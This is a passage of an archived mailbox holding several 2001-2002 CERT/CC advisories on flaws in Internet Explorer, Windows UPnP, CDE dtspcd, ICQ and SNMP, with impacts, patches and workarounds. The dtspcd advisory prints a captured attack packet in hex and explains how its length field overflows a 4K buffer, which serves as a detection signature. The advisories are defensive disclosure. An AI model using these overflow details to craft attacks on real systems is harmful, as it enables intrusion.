are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History December 13, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPBj+TqCVPMXQI2HJAQGKugP9E50mOcpH0e83E5O2iblG69TRcrlHrtd8 R2lsxc/DMr9Yeh4/+WUG020wSsOBFD1EiCnnW4L8YOowkRQgaYu2xyFh33N3cPXY 0c24NL13UlMydkBb3fLkSSKDmhurzK+ewuFif3fCREReuQrFVaVdYRWSgzG3l4wq r9w81K9rgbY= =8koV -----END PGP SIGNATURE----- From - Wed Dec 19 17:11:05 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id fBK12DW28959; Wed, 19 Dec 2001 17:02:13 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id SAA25821; Wed, 19 Dec 2001 18:07:43 -0500 (EST) Date: Wed, 19 Dec 2001 18:07:43 -0500 (EST) Received: by canaveral.red.cert.org; Wed, 19 Dec 2001 17:58:43 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-36 Microsoft Internet Explorer Does Not Respect Content-Disposition and Content-Type MIME Headers X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 32831e19563691c4cd6897c9c362ab60 Status: RO X-Status: X-Keywords: X-UID: 33 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-36 Microsoft Internet Explorer Does Not Respect Content-Disposition and Content-Type MIME Headers Original release date: December 19, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Microsoft Internet Explorer 6.0 for Windows * Microsoft Outlook, Outlook Express, or any other software that utilizes vulnerable versions of Internet Explorer to render HTML Overview Microsoft Internet Explorer contains a vulnerability in its handling of certain MIME headers in web pages and HTML email messages. This vulnerability may allow an attacker to execute arbitrary code on the victim's system when the victim visits a web page or views an HTML email message. I. Description Web pages and HTML email messages usually contain HTML text, but other files may also be included. The MIME headers Content-Disposition and Content-Type provide the information needed by the HTML rendering software to determine the type of these files. In Microsoft Internet Explorer, these MIME headers are consulted when evaluating whether to process an embedded file, but they are ignored when the file is actually processed. For example, if an executable (.exe) file is embedded with MIME headers that misrepresent it as a JPEG image file (.jpg), Internet Explorer will treat the file as a JPEG when evaluating whether it is safe to open. Once this evaluation is complete, the file will be opened according to its .exe file extension and will be executed on the local system. This behavior results in a vulnerability that allows attackers to bypass the security measures that typically screen out executable code. This code would be executed with the privileges the user who views the web page or email message. Users who view a malicious web site or HTML email message may be able to prevent the execution of the attacker's code by using the download progress dialog box to cancel the download. However, depending on the size of the embedded file and the speed of the network connection, users may not have time to cancel the file download. The CERT/CC is tracking this vulnerability as VU#443699, which corresponds directly to the "File Execution" vulnerability described in Microsoft Security Bulletin MS01-058. This Microsoft bulletin is available at http://www.microsoft.com/technet/security/bulletin/MS01-058.asp This vulnerability is being referenced in CVE as CAN-2001-0727. II. Impact By convincing a user to view a malicious web page or HTML email message, a remote attacker can cause the user to execute arbitrary code. Any such code would run with the privileges of the user who attempted to view the content. III. Solution Apply a patch from your vendor Microsoft has released a cumulative patch for Internet Explorer that corrects this vulnerability and several others. For more information about the patch and the vulnerabilities, please see Microsoft Security Bulletin MS01-058: http://www.microsoft.com/technet/security/bulletin/MS01-058.asp Disable file downloads in all security zones As a workaround, you can prevent malicious files from being downloaded by disabling file downloads in all security zones. Note that this decision will impact browser functionality. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Microsoft Corporation The following documents regarding this vulnerability are available from Microsoft: http://www.microsoft.com/technet/security/bulletin/MS01-058.asp http://support.microsoft.com/default.aspx?scid=kb;EN-US;q313675 _________________________________________________________________ The CERT Coordination Center acknowledges Jouko Pynnonen as the discoverer of this vulnerability and thanks Microsoft for the information presented in MS01-058. _________________________________________________________________ Author: This document was written by Jeffrey P. Lanza. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-36.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History December 19, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPCEWlaCVPMXQI2HJAQFgDwP/RG6V61VtHeQAXVUL/JxqTXahz0BpwxPW WCyHWrIZ7fkXTJJtecqGD3zeDiWNwdk+r83a5amgCzbj2Abfp6U3mmTOArlkV3Ge RbptkjNfd4M1KLtvbjMBSUlypxDdT/fLSjogT57IJk2ZiD3WMxvBU0CQun+zxhu1 lMdqudg6GpQ= =Qwr2 -----END PGP SIGNATURE----- From - Thu Dec 20 18:50:55 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id fBL2Xrg25271; Thu, 20 Dec 2001 18:33:53 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id UAA01169; Thu, 20 Dec 2001 20:22:24 -0500 (EST) Date: Thu, 20 Dec 2001 20:22:24 -0500 (EST) Received: by canaveral.red.cert.org; Thu, 20 Dec 2001 20:13:15 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-37 Buffer Overflow in UPnP Service On Microsoft Windows X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 19447dcad564059fd394b11d3e666150 Status: RO X-Status: X-Keywords: X-UID: 34 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-37 Buffer Overflow in UPnP Service On Microsoft Windows Original release date: December 20, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Microsoft Windows XP * Microsoft Windows ME * Microsoft Windows 98 * Microsoft Windows 98SE Overview Vulnerabilities in software included by default on Microsoft Windows XP, and optionally on Windows ME and Windows 98, may allow an intruder to execute arbitrary code on vulnerable systems, to launch denial-of-service attacks against vulnerable systems, or to use vulnerable systems to launch denial-of-service attacks against third-party systems. I. Description There is a vulnerability in the Universal Plug and Play (UPnP) service on Microsoft Windows XP and Microsoft Windows ME that could permit an intruder to execute arbitrary code with administrative privileges on a vulnerable system. The UPnP service is enabled by default on XP. Microsoft does not ship Windows ME with UPnP enabled by default, but some PC manufacturers do. UPnP may be optionally installed on Windows 98 and Windows 98SE. This vulnerability was discovered by Eeye Digital Security. For more information, see http://www.eeye.com/html/Research/Advisories/AD20011220.html http://www.microsoft.com/technet/security/bulletin/MS01-059.asp Universal Plug and Play (UPnP) is a set of protocols that allow computer systems and network devices to work together with little or no prior configuration. One vulnerability is a buffer overflow in the code that handles UPnP NOTIFY directives. This vulnerability permits an intruder to send a malicious NOTIFY directive to a vulnerable computer and cause the computer to run code of the intruder's choice. The code will run with full privileges on all vulnerable systems, including Windows XP. This can permit an attacker to take complete control of the system. A second vulnerability in the Microsoft Windows implementation of UPnP could allow an intruder to consume memory and processor time on vulnerable systems, resulting in performance degradation. Variations on this problem can allow an intruder to use a vulnerable system to launch a denial-of-service attack against a third-party. For more information about these vulnerabilities, see http://www.kb.cert.org/vuls/id/951555 http://www.kb.cert.org/vuls/id/411059 These vulnerabilities have been assigned the CVE identifiers CAN-2001-0876 and CAN-2001-0877, respectively. II. Impact Intruders can gain complete control of vulnerable systems, or interrupt the normal operation of vulnerable systems. III. Solution Apply a patch from your vendor Microsoft has provided patch information in their bulletin. Please see MS01-059, available from http://www.microsoft.com/technet/security/bulletin/MS01-059.asp Block Access to UPnP Service Until a patch can be applied, you can reduce your exposure to this problem by blocking access to ports 1900 and 5000 at your network border. This does not eliminate your exposure to attacks originating from within your network, however. Note that Microsoft Internet Connection Firewall, which runs by default on Windows XP, does not provide complete protection against this attack. Specifically, an intruder can still use a broadcast or multicast address to reach the UPnP service on Microsoft Windows. On systems that don't require UPnP, it can be disabled. Author: Shawn V. Hernan ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-37.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History December 20, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPCKL0KCVPMXQI2HJAQHiugP6AiOA0OEEVmdFKhkhZEznW84XKBZPrURz Z9XA6lYs7ZdZnLD3xRAheDuoYF2p3xVrJXayzXPVrk7axWotgljqUBBMn4Ce5Nh8 2kRMjVHt66jW39R5TGc37B5XBjy55XXNwAoBzBFC8uvu0tk+hvRpbkxqGZ7rhKtI 2AWSkUlltMk= =O0YG -----END PGP SIGNATURE----- From - Mon Jan 14 12:42:13 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g0EKehF09062; Mon, 14 Jan 2002 12:40:43 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id MAA14048; Mon, 14 Jan 2002 12:03:42 -0500 (EST) Date: Mon, 14 Jan 2002 12:03:42 -0500 (EST) Received: by canaveral.red.cert.org; Mon, 14 Jan 2002 11:58:31 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-01 Exploitation of Vulnerability in CDE Subprocess X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 10 Status: RO X-Status: X-Keywords: X-UID: 35 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-01 Exploitation of Vulnerability in CDE Subprocess Control Service Original release date: January 14, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Systems running CDE Overview The CERT/CC has received credible reports of scanning and exploitation of Solaris systems running the CDE Subprocess Control Service buffer overflow vulnerability identified in CA-2001-31 and discussed in VU#172583. I. Description Since CA-2001-31 was originally released last November, the CERT/CC has received reports of scanning for dtspcd (6112/tcp). Just recently, however, we have received credible reports of an exploit for Solaris systems. Using network traces provided by The Honeynet Project, we have confirmed that the dtspcd vulnerability identified in CA-2001-31 and discussed in VU#172583 is actively being exploited. The Common Desktop Environment (CDE) is an integrated graphical user interface that runs on UNIX and Linux operating systems. The CDE Subprocess Control Service (dtspcd) is a network daemon that accepts requests from clients to execute commands and launch applications remotely. On systems running CDE, dtspcd is spawned by the Internet services daemon (typically inetd or xinetd) in response to a CDE client request. dtspcd is typically configured to run on port 6112/tcp with root privileges. There is a remotely exploitable buffer overflow vulnerability in a shared library that is used by dtspcd. During client negotiation, dtspcd accepts a length value and subsequent data from the client without performing adequate input validation. As a result, a malicious client can manipulate data sent to dtspcd and cause a buffer overflow, potentially executing code with root privileges. The overflow occurs in a fixed-size 4K buffer that is exploited by the contents of one of the attack packets. The signature can be found at bytes 0x3e-0x41 in the following attack packet from a tcpdump log (lines may wrap): 09:46:04.378306 10.10.10.1.3592 > 10.10.10.2.6112: P 1:1449(1448) ack 1 win 16060 (DF) 0x0000 4500 05dc a1ac 4000 3006 241c 0a0a 0a01 E.....@.0.$..... 0x0010 0a0a 0a02 0e08 17e0 fee2 c115 5f66 192f ...f........_f./ 0x0020 8018 3ebc e1e9 0000 0101 080a 1ba7 dffb ..>............. 0x0030 003f 7548 3030 3030 3030 3032 3034 3130 .?uH000000020410 0x0040 3365 3030 3031 2020 3420 0000 0031 3000 3e0001..4....10. 0x0050 801c 4011 801c 4011 1080 0101 801c 4011 ..@...@.......@. 0x0060 801c 4011 801c 4011 801c 4011 801c 4011 ..@...@...@...@. ... The value 0x103e in the ASCII (right) column above is interpreted by the server as the number of bytes in the packet to copy into the internal 4K (0x1000) buffer. Since 0x103e is greater than 0x1000, the last 0x3e bytes of the packet will overwrite memory after the end of the 4K buffer. This is the same compromise vector identified in VU#172583. It is important to note that several Internet-enabled games may also use port 6112/tcp as a legitimate part of their normal operation, therefore, not all network activity involving this service may be malicious. Network administrators monitoring this type of activity may wish to verify whether probes of this type are actually attempts to exploit VU#172583. Many common UNIX systems ship with CDE installed and enabled by default. To determine if your system is configured to run dtspcd, check for the following entries (lines may wrap): in /etc/services dtspc 6112/tcp in /etc/inetd.conf dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd Any system that does not run the CDE Subprocess Control Service is not vulnerable to this problem. II. Impact An attacker can execute arbitrary code with root privileges. III. Solution Apply a patch VU#172583 contains information from vendors who have provided information for this advisory. We will update the vulnerability note as we receive more information. If a vendor's name does not appear, then the CERT/CC did not hear from that vendor. Please contact your vendor directly. Vendor information can be found in the "Systems Affected" section of VU#172583 http://www.kb.cert.org/vuls/id/172583#systems Limit access to vulnerable service Until patches are available and can be applied, you may wish to limit or block access to the Subprocess Control Service from untrusted networks such as the Internet. Using a firewall or other packet-filtering technology, block or restrict access to the port used by the Subprocess Control Service. As noted above, dtspcd is typically configured to listen on port 6112/tcp. It may be possible to use TCP Wrapper or a similar technology to provide improved access control and logging functionality for dtspcd connections. Keep in mind that blocking ports at a network perimeter does not protect the vulnerable service from the internal network. It is important to understand your network configuration and service requirements before deciding what changes are appropriate. TCP Wrapper is available from ftp://ftp.porcupine.org/pub/security/index.html Disable vulnerable service You may wish to consider disabling dtspcd by commenting out the appropriate entry in /etc/inetd.conf. As a best practice, the CERT/CC recommends disabling any services that are not explicitly required. As noted above, it is important to consider the consequences of such a change in your environment. Appendix A. - References 1. http://www.kb.cert.org/vuls/id/172583 2. http://www.cert.org/advisories/CA-2001-31.html 3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0803 4. http://xforce.iss.net/alerts/advise101.php 5. http://www.opengroup.org/cde/ 6. http://www.opengroup.org/desktop/faq/ _________________________________________________________________ The CERT Coordination Center thanks The Honeynet Project for their assistance in providing network traces of the exploitation. _________________________________________________________________ Authors: Allen Householder and Art Manion ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-01.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History January 14, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPEMNnqCVPMXQI2HJAQGkDQP/Qyqf6VA3YfEtocbOG/Y8AsoXvijR012q 1Dt1xCh2rQ6KKVZF5XQtaLKZHfBNEANCHwSUodyVhebhbDgEQoO8EYLMBax217zu 8/r1v/hYycXuOB5mafWLnHOvkJnMIJKAY0wRY6oe2f1FoPZxnG99fbEpFc1zwNnM VlnrCteeVBI= =DBAz -----END PGP SIGNATURE----- From - Thu Jan 24 14:51:58 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g0OMnRB29788; Thu, 24 Jan 2002 14:49:28 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA29244; Thu, 24 Jan 2002 14:54:59 -0500 (EST) Date: Thu, 24 Jan 2002 14:54:58 -0500 (EST) Received: by canaveral.red.cert.org; Thu, 24 Jan 2002 14:46:16 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-02 Buffer Overflow in AOL ICQ X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 25 Status: RO X-Status: X-Keywords: X-UID: 36 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-02 Buffer Overflow in AOL ICQ Original release date: January 24, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * AOL Mirabilis ICQ Versions 2001A and prior * Voice Video & Games plugin installed with AOL Mirabilis ICQ Versions 2001B Beta v5.18 Build #3659 and prior Overview There is a remotely exploitable buffer overflow in ICQ. Attackers that are able to exploit the vulnerability may be able to execute arbitrary code with the privileges of the victim user. Full details are discussed in VU#570167. An exploit is known to exist, but we do not believe it has been distributed in the wild. We have not seen active scanning for this vulnerability, nor have we received any reports of this vulnerability being exploited. I. Description ICQ is a program for communicating with other users over the Internet. ICQ is widely used (by over 122 million people according to ICQ Inc, an AOL Time Warner owned subsidiary). A buffer overflow exists in the ICQ client for Windows. The buffer overflow occurs during the processing of a Voice Video & Games feature request message. This message is supposed to be a request from another ICQ user inviting the victim to participate interactively with a third-party application. In versions prior to 2001B, the buffer overflow occurs in code within the ICQ client. In version 2001B the code containing the buffer overflow was moved to an external plug-in. Therefore, all versions prior to the latest build of 2001B are vulnerable. Upon connection to an AOL ICQ server, vulnerable builds of the 2001B client will be instructed by the server to disable the vulnerable plug-in. Since versions of the ICQ client prior to 2001B do not have an external plug-in to disable, they are vulnerable even after connecting to the server. AOL Time Warner is recommending all users of vulnerable versions of ICQ upgrade to 2001B Beta v5.18 Build #3659. During normal operation, ICQ clients can exchange messages with one another through the ICQ servers or via a direct connection. The buffer overflow specifically occurs during the processing of the Voice Video & Games request via a Type, Length, Value (TLV) tuple with type 0x2711 from the ICQ server, or via a crafted direct connection request. Some versions of the ICQ client open port 4000/UDP for client-server communication. Other versions open port 5190/TCP for this communication. As with the previously reported AIM vulnerability, AOL has modified the ICQ server infrastructure to filter malicious messages that attempt to exploit this vulnerability, preventing it from being exploited through an AOL ICQ server. Exploiting the vulnerability through other means (man-in-the-middle attacks, third-party ICQ servers, DNS spoofing, network sniffing, etc.) may still be possible. Also, since UDP packets can be broadcast on a network, a malicious TLV packet with a spoofed source IP address may be accepted as a legitimate server message. The ICQ client also listens on a variably assigned TCP port for direct connection requests. A person who wishes to establish a direct connection can query an ICQ server for the IP address and listening port of the victim. Versions 2000A and prior accept direct connections from anyone by default. Later versions of ICQ can be configured to accept direct connections from anyone. Since ICQ requests can be sent directly from one client to another, blocking requests through a central server is not a completely effective solution. The effective solution is to apply a patch, when available, that fixes the buffer overflow, or upgrade to 2001B Beta v5.18 Build #3659 with the Voice Video & Games feature disabled. This vulnerability has been assigned the identifier CAN-2002-0028 by the Common Vulnerabilities and Exposures (CVE) group: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0028 II. Impact An attacker can execute arbitrary code with the privileges of the victim user. III. Solution All users should upgrade to version 2001B Beta v5.18 Build #3659. There is currently no patch available for the ICQ plug-in for 2001B or versions of the ICQ client prior to 2001B. Version 2001B Beta v5.18 Build #3659's installer will delete the vulnerable plug-in. In addition, for users who log in to the server with versions of 2001B prior to Beta v5.18 Build #3659, access to the vulnerable plug-in will be disabled. Users with versions prior to 2001B must upgrade to mitigate this vulnerability. Block ICQ/SMS requests at the firewall Blocking connections to login.icq.com and access to ports 4000/UDP, 5190/TCP and the TCP port that your client chooses to listen on may prevent exploitation of this vulnerability. Note that the client may establish a new listening port each time it is run. Note also that this does not protect you from attacks within the perimeter of your firewall. Block untrusted messages ICQ permits the user to deny direct connections from anyone without authorization or accept direct connections from known peers only. We recommend denying direct connections from anyone without authorization. By accepting direct connections from known peers, you may still be vulnerable to attacks that originate from known peers if the peer has been compromised. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. AOL Time Warner See http://web.icq.com/help/quickhelp/1,,117,00.html _________________________________________________________________ The CERT Coordination Center thanks Daniel Tan and AOL Time Warner for their assistance in discovering and analyzing this vulnerability. _________________________________________________________________ Author: Jason A. Rafail _________________________________________________________________ Appendix B. - References 1. http://www.kb.cert.org/vuls/id/570167 2. http://www.securityfocus.com/bid/3813 3. http://web.icq.com/help/quickhelp/1,,117,00.html ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-02.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History January 24, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPFBhSKCVPMXQI2HJAQH5HAQAgW7wzSjezC68o+q8fDGgokZzgEK8+28I 9PS9W4/Ah48+6LEnIW1gE0yfqTnt/vIONFZf0Wy2hfgUTJbLAj3kA5lGiCIu7aog XSUwSnY7YOYa7i6tEWL0OoFWVtAWDlCf6ty1bt5UQqVAiLZcMzJlCehnLK/WHYq8 FrCx65d/sR0= =DlDC -----END PGP SIGNATURE----- From - Tue Feb 12 15:02:08 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id g1CMXLZ05866; Tue, 12 Feb 2002 14:33:21 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA21304; Tue, 12 Feb 2002 14:41:02 -0500 (EST) Date: Tue, 12 Feb 2002 14:41:02 -0500 (EST) Received: by canaveral.red.cert.org; Tue, 12 Feb 2002 14:35:35 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-03 Multiple Vulnerabilities in Many Implementations X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 49 Status: RO X-Status: X-Keywords: X-UID: 37 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-03: Multiple Vulnerabilities in Many Implementations of the Simple Network Management Protocol (SNMP) Original release date: February 12, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Products from a very wide variety of vendors may be affected. See Vendor Information for details from vendors who have provided feedback for this advisory. In addition to the vendors who provided feedback for this advisory, a list of vendors whom CERT/CC contacted regarding these problems is available from http://www.kb.cert.org/vuls/id/854306 http://www.kb.cert.org/vuls/id/107186 Many other systems making use of SNMP may also be vulnerable but were not specifically tested. Overview Numerous vulnerabilities have been reported in multiple vendors' SNMP implementations. These vulnerabilities may allow unauthorized privileged access, denial-of-service attacks, or cause unstable behavior. If your site uses SNMP in any capacity, the CERT/CC encourages you to read this advisory and follow the advice provided in the Solution section below. In addition to this advisory, we also have an FAQ available at http://www.cert.org/tech_tips/snmp_faq.html I. Description The Simple Network Management Protocol (SNMP) is a widely deployed protocol that is commonly used to monitor and manage network devices. Version 1 of the protocol (SNMPv1) defines several types of SNMP messages that are used to request information or configuration changes, respond to requests, enumerate SNMP objects, and send unsolicited alerts. The Oulu University Secure Programming Group (OUSPG, http://www.ee.oulu.fi/research/ouspg/) has reported numerous vulnerabilities in SNMPv1 implementations from many different vendors. More information about SNMP and OUSPG can be found in Appendix C OUSPG's research focused on the manner in which SNMPv1 agents and managers handle request and trap messages. By applying the PROTOS c06-snmpv1 test suite (http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/0100.h tml) to a variety of popular SNMPv1-enabled products, the OUSPG revealed the following vulnerabilities: VU#107186 - Multiple vulnerabilities in SNMPv1 trap handling SNMP trap messages are sent from agents to managers. A trap message may indicate a warning or error condition or otherwise notify the manager about the agent's state. SNMP managers must properly decode trap messages and process the resulting data. In testing, OUSPG found multiple vulnerabilities in the way many SNMP managers decode and process SNMP trap messages. VU#854306 - Multiple vulnerabilities in SNMPv1 request handling SNMP request messages are sent from managers to agents. Request messages might be issued to obtain information from an agent or to instruct the agent to configure the host device. SNMP agents must properly decode request messages and process the resulting data. In testing, OUSPG found multiple vulnerabilities in the way many SNMP agents decode and process SNMP request messages. Vulnerabilities in the decoding and subsequent processing of SNMP messages by both managers and agents may result in denial-of-service conditions, format string vulnerabilities, and buffer overflows. Some vulnerabilities do not require the SNMP message to use the correct SNMP community string. These 